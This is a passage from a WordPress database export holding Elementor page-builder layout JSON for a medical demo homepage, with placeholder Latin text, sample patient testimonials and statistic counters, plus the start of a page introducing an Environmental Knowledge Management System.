llax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"iulpcd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"m7heks5\",\"elType\":\"widget\",\"settings\":{\"title\":\"Reserve now in our hospital\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"typography_line_height_mobile\":{\"unit\":\"em\",\"size\":1.4}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"zq38c4y\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"weight\":{\"unit\":\"px\",\"size\":6},\"color\":\"#01aef0\",\"width\":{\"unit\":\"px\",\"size\":40},\"align\":\"center\",\"gap\":{\"unit\":\"px\",\"size\":16},\"_css_classes\":\"no-margin\",\"text\":\"Divider\"},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"9kdvz1o\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Praesent vitae orci quam morbi vehicula eros sem, nec tincidunt ipsum imperdiet sed\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"y3vt4zr\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8088599\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1fhtv2k\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4fnui4s\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/medical.oceanwp.org\\/wp-content\\/uploads\\/2017\\/09\\/img_563214.jpg\",\"id\":144},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"104\",\"height\":\"104\"},\"image_border_radius\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0,0,0,0.2)\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"hlxu9mu\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\"},\"title_text\":\"Transplant Services\",\"description_text\":\"Nulla metus metus ullamcorper vel tincidunt sed, euismod in ouisque volutpat litora torquent\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"k5ey6e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Read More\",\"align\":\"center\",\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":8},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0.4},\"button_text_color\":\"#333333\",\"background_color\":\"rgba(0,0,0,0)\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"vpd68pg\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"sp1hkvu\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/medical.oceanwp.org\\/wp-content\\/uploads\\/2017\\/09\\/img_957412.jpg\",\"id\":145},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"104\",\"height\":\"104\"},\"image_border_radius\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0,0,0,0.2)\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"tfbwu8m\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\"},\"title_text\":\"Pediatric Clinic\",\"description_text\":\"Sed lectus. Integer euismod lacus luctus magna. Quisque cursus, metus vitae sem massa mattis\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"wiytuem\",\"elType\":\"widget\",\"settings\":{\"text\":\"Read More\",\"align\":\"center\",\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":8},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0.4},\"button_text_color\":\"#333333\",\"background_color\":\"rgba(0,0,0,0)\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"skqiyik\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fv7id0y\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/medical.oceanwp.org\\/wp-content\\/uploads\\/2017\\/09\\/img_369542.jpg\",\"id\":143},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"104\",\"height\":\"104\"},\"image_border_radius\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0,0,0,0.2)\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"1fkclio\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\"},\"title_text\":\"Dental Clinic\",\"description_text\":\"Ullamcorper. Nulla facilisi. Integer lacinia sollicitudin massa. Cras metus. Sed aliquet risus a id tortor\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"mtrt6oy\",\"elType\":\"widget\",\"settings\":{\"text\":\"Read More\",\"align\":\"center\",\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":8},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0.4},\"button_text_color\":\"#333333\",\"background_color\":\"rgba(0,0,0,0)\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"xm3kst6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Register Now\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_family\":\"Dosis\",\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"background_color\":\"#01aef0\",\"hover_color\":\"#01aef0\",\"button_background_hover_color\":\"rgba(0,0,0,0)\",\"button_hover_border_color\":\"#01aef0\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"border_color\":\"#01aef0\",\"border_radius\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"30\",\"bottom\":\"10\",\"left\":\"30\",\"isLinked\":false},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":12}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"960wyxr\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#01aef0\",\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8dbf01c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"8231wcp\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"b8k6776\",\"elType\":\"widget\",\"settings\":{\"starting_number\":\"\",\"ending_number\":142,\"title\":\"saved hearts\",\"number_color\":\"#ffffff\",\"typography_number_typography\":\"custom\",\"typography_number_font_size\":{\"unit\":\"px\",\"size\":50},\"title_color\":\"#ffffff\",\"typography_title_typography\":\"custom\",\"typography_title_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_title_font_weight\":\"600\",\"typography_title_text_transform\":\"uppercase\",\"typography_title_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"typography_number_font_size_tablet\":{\"unit\":\"px\",\"size\":30},\"typography_title_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"counter\"}],\"isInner\":false},{\"id\":\"ktjw2tm\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"gffdt05\",\"elType\":\"widget\",\"settings\":{\"starting_number\":\"\",\"ending_number\":6424,\"suffix\":\"+\",\"title\":\"happy patients\",\"number_color\":\"#ffffff\",\"typography_number_typography\":\"custom\",\"typography_number_font_size\":{\"unit\":\"px\",\"size\":50},\"title_color\":\"#ffffff\",\"typography_title_typography\":\"custom\",\"typography_title_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_title_font_weight\":\"600\",\"typography_title_text_transform\":\"uppercase\",\"typography_title_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"typography_number_font_size_tablet\":{\"unit\":\"px\",\"size\":30},\"typography_title_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"counter\"}],\"isInner\":false},{\"id\":\"k1ny1cq\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"jegms49\",\"elType\":\"widget\",\"settings\":{\"starting_number\":\"\",\"ending_number\":1382,\"suffix\":\"+\",\"title\":\"doctors number\",\"number_color\":\"#ffffff\",\"typography_number_typography\":\"custom\",\"typography_number_font_size\":{\"unit\":\"px\",\"size\":50},\"title_color\":\"#ffffff\",\"typography_title_typography\":\"custom\",\"typography_title_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_title_font_weight\":\"600\",\"typography_title_text_transform\":\"uppercase\",\"typography_title_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"typography_number_font_size_tablet\":{\"unit\":\"px\",\"size\":30},\"typography_title_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"counter\"}],\"isInner\":false},{\"id\":\"mjm18s4\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"wsyu9mt\",\"elType\":\"widget\",\"settings\":{\"starting_number\":\"\",\"ending_number\":275,\"title\":\"saved lungs\",\"number_color\":\"#ffffff\",\"typography_number_typography\":\"custom\",\"typography_number_font_size\":{\"unit\":\"px\",\"size\":50},\"title_color\":\"#ffffff\",\"typography_title_typography\":\"custom\",\"typography_title_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_title_font_weight\":\"600\",\"typography_title_text_transform\":\"uppercase\",\"typography_title_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"typography_number_font_size_tablet\":{\"unit\":\"px\",\"size\":30},\"typography_title_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"counter\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"t2gvx2f\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/medical.oceanwp.org\\/wp-content\\/uploads\\/2017\\/09\\/img_159211.jpg\",\"id\":156},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#364e66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.8},\"padding\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ffe3375\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"cq7te54\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"unlkljg\",\"elType\":\"widget\",\"settings\":{\"title\":\"What Our Patients Say\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"typography_line_height_mobile\":{\"unit\":\"em\",\"size\":1.4}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"ayvp0xr\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"weight\":{\"unit\":\"px\",\"size\":6},\"color\":\"#01aef0\",\"width\":{\"unit\":\"px\",\"size\":40},\"align\":\"center\",\"gap\":{\"unit\":\"px\",\"size\":16},\"_css_classes\":\"no-margin\",\"text\":\"Divider\"},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"rot3ixr\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Praesent vitae orci quam morbi vehicula eros sem, nec tincidunt ipsum imperdiet sed<\\/p>\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"gx8goxj\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"deb0197\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"fc8q2qe\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"1gdmbbl\",\"elType\":\"widget\",\"settings\":{\"testimonial_content\":\"Saperet periculis principes in vis, est ne minim admodum. Ignota perpetua torquatos id ius, ut consul probatus conceptam est, ea sit graecis singulis. Maiorum pertinacia ea per, has quis euripidis at. Persius civibus eligendi.\",\"testimonial_image\":{\"url\":\"https:\\/\\/medical.oceanwp.org\\/wp-content\\/uploads\\/2017\\/09\\/img_428339.jpg\",\"id\":153},\"testimonial_name\":\"Mike Wright\",\"testimonial_job\":\"Patient #1\",\"content_content_color\":\"#ffffff\",\"content_typography_typography\":\"custom\",\"content_typography_font_size\":{\"unit\":\"px\",\"size\":16},\"name_text_color\":\"#ffffff\",\"name_typography_typography\":\"custom\",\"name_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"name_typography_font_weight\":\"600\",\"name_typography_text_transform\":\"uppercase\",\"name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"job_text_color\":\"#ffffff\",\"job_typography_typography\":\"custom\",\"job_typography_font_size\":{\"unit\":\"px\",\"size\":12}},\"elements\":[],\"widgetType\":\"testimonial\"},{\"id\":\"eo56seo\",\"elType\":\"widget\",\"settings\":{\"weight\":{\"unit\":\"px\",\"size\":2},\"color\":\"rgba(255,255,255,0.2)\",\"text\":\"Divider\"},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"y7o9kxz\",\"elType\":\"widget\",\"settings\":{\"testimonial_content\":\"Sed tale aeterno saperet ex. Placerat quaestio ea ius, eos vocent euismod ex, alia recusabo signiferumque pro no. Qui mel dictas erroribus. Eros ullum no est, ei nisl wisi ius. Bonorum expetenda et eum. Ius dolor inimicus.\",\"testimonial_image\":{\"url\":\"https:\\/\\/medical.oceanwp.org\\/wp-content\\/uploads\\/2017\\/09\\/img_324658.jpg\",\"id\":152},\"testimonial_name\":\"Nancy Green\",\"testimonial_job\":\"Patient #3\",\"content_content_color\":\"#ffffff\",\"content_typography_typography\":\"custom\",\"content_typography_font_size\":{\"unit\":\"px\",\"size\":16},\"name_text_color\":\"#ffffff\",\"name_typography_typography\":\"custom\",\"name_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"name_typography_font_weight\":\"600\",\"name_typography_text_transform\":\"uppercase\",\"name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"job_text_color\":\"#ffffff\",\"job_typography_typography\":\"custom\",\"job_typography_font_size\":{\"unit\":\"px\",\"size\":12}},\"elements\":[],\"widgetType\":\"testimonial\"}],\"isInner\":true},{\"id\":\"ea8zdxf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"jzgwrdz\",\"elType\":\"widget\",\"settings\":{\"testimonial_content\":\"Ad qui facete melius dolores. Elitr invidunt vix ex, agam convenire democritum an mel. Ad per autem dicta consul, te corpora nostrum consulatu quo. An doming quodsi usu, id vis unum facilisi, vivendo nonumes hendrerit.\",\"testimonial_image\":{\"url\":\"https:\\/\\/medical.oceanwp.org\\/wp-content\\/uploads\\/2017\\/09\\/img_301284.jpg\",\"id\":151},\"testimonial_name\":\"Frances Lopez\",\"testimonial_job\":\"Patient #2\",\"content_content_color\":\"#ffffff\",\"content_typography_typography\":\"custom\",\"content_typography_font_size\":{\"unit\":\"px\",\"size\":16},\"name_text_color\":\"#ffffff\",\"name_typography_typography\":\"custom\",\"name_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"name_typography_font_weight\":\"600\",\"name_typography_text_transform\":\"uppercase\",\"name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"job_text_color\":\"#ffffff\",\"job_typography_typography\":\"custom\",\"job_typography_font_size\":{\"unit\":\"px\",\"size\":12}},\"elements\":[],\"widgetType\":\"testimonial\"},{\"id\":\"7fr075g\",\"elType\":\"widget\",\"settings\":{\"weight\":{\"unit\":\"px\",\"size\":2},\"color\":\"rgba(255,255,255,0.2)\",\"text\":\"Divider\"},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"6kl9wra\",\"elType\":\"widget\",\"settings\":{\"testimonial_content\":\"Morbi in ipsum sit amet pede facilisis laoreet. Donec lacus nunc, viverra nec, blandit vel, egestas et, augue. Vestibulum tincidunt malesuada ultrices enim. Curabitur sit amet mauris. Morbi in dui quis est pulvinar facilisi.\",\"testimonial_image\":{\"url\":\"https:\\/\\/medical.oceanwp.org\\/wp-content\\/uploads\\/2017\\/09\\/img_91227.jpg\",\"id\":150},\"testimonial_name\":\"Nick Smith\",\"testimonial_job\":\"Patient #4\",\"content_content_color\":\"#ffffff\",\"content_typography_typography\":\"custom\",\"content_typography_font_size\":{\"unit\":\"px\",\"size\":16},\"name_text_color\":\"#ffffff\",\"name_typography_typography\":\"custom\",\"name_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"name_typography_font_weight\":\"600\",\"name_typography_text_transform\":\"uppercase\",\"name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"job_text_color\":\"#ffffff\",\"job_typography_typography\":\"custom\",\"job_typography_font_size\":{\"unit\":\"px\",\"size\":12}},\"elements\":[],\"widgetType\":\"testimonial\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"yb7q3d9\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2b48461\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"bm6vhpr\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"393qxl0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Latest from blog\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":18}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"uqjuvgf\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"weight\":{\"unit\":\"px\",\"size\":6},\"color\":\"#01aef0\",\"width\":{\"unit\":\"px\",\"size\":40},\"align\":\"center\",\"gap\":{\"unit\":\"px\",\"size\":16},\"_css_classes\":\"no-margin\",\"text\":\"Divider\"},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"liad1d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Praesent vitae orci quam morbi vehicula eros sem, nec tincidunt ipsum imperdiet sed<\\/p>\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"mrc2wel\",\"elType\":\"widget\",\"settings\":{\"items\":\"3\",\"tablet\":\"2\",\"mobile\":\"1\",\"count\":\"6\",\"author\":\"false\",\"cat\":\"false\",\"excerpt_length\":\"15\",\"readmore_text\":\"Learn More\"},\"elements\":[],\"widgetType\":\"oew-blog-carousel\"}],\"isInner\":false}],\"isInner\":false}]'),(3054,393,'_elementor_version','0.4'),(3055,393,'_elementor_template_type','wp-page'),(3058,394,'_wp_page_template','default'),(3059,394,'_elementor_edit_mode','builder'),(3060,394,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":880},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/medical.oceanwp.org\\/wp-content\\/uploads\\/2017\\/09\\/img_247786.jpg\",\"id\":148},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#364e66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.8},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions 